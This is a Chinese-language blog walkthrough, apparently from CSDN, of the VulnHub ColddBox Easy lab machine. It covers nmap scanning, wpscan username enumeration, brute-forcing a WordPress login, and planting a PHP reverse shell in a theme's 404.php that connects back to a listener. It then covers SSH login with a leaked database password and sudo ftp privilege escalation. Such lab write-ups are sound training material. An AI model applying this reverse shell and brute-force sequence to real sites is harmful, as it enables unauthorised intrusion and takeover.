VulnHub-ColddBoxEasy_EN

靶机 DHCP 未能正确分配 IP :看这里
靶机地址:http://www.vulnhub.com/entry/colddbox-easy,586/

正常流程,先上nmap,题目未给出ip地址所以使用 -sP 先获取ip地址

nmap -sP 网段/mask

可见ip地址为:129
在这里插入图片描述
使用 -sV 进行详细信息扫描

nmap -sV ip

在这里插入图片描述
然后使用 nmap -A 指定端口进行综合扫描

nmap -A ip -p port

在这里插入图片描述
看见WordPress直接使用wpscan扫描
虽然没直接扫出什么漏洞,但是枚举出了三个用户名

wpscan --url http://ip			#直接进行扫描
wpscan --url http://ip -e u		#枚举用户名

在这里插入图片描述
尝试使用wpscan破解密码

wpscan --url http://ip --passwords file --usernames userName

使用c0ldd用户进行爆破
字典选择 /usr/share/wordlists/ 下的 rockyou.txt
如果是压缩的那使用

gunzip fileName

进行解压即可
跑一会就可以看见密码为:9876543210
用这个密码连接ssh失败,看来只能用来登入网页
在这里插入图片描述
使用 ip/wp-admin 访问后台
进行登入后,直接修改模板文件就可以进行反弹shell
(这里可以尝试使用msf进行操作)
在这里插入图片描述

$ip="ip";
$port=port;
$sock = fsockopen($ip, $port);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

然后使用 nc 进行接收

nc -nvlp port

nc 开启监听后访问404.php页面,路径:

http://ip/wp-content/themes/twentyfifteen/404.php

可见已经连接到靶机
在这里插入图片描述
登入后查看数据库配置文件
在这里插入图片描述
看见了另外一个密码:cybersecurity
使用这个密码登入ssh

ssh userName@ip -p port

在这里插入图片描述
ls查看当前目录发现一个user.txt,里面是base64编码,解密后输出
Felicidades, primer nivel conseguido!
貌似没啥用
在这里插入图片描述

#base64 解密
echo '密文' | base64 -d

sudo -l 可见给出三种提权方式
在这里插入图片描述
这里使用ftp提权
在这里插入图片描述
getFlag
在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值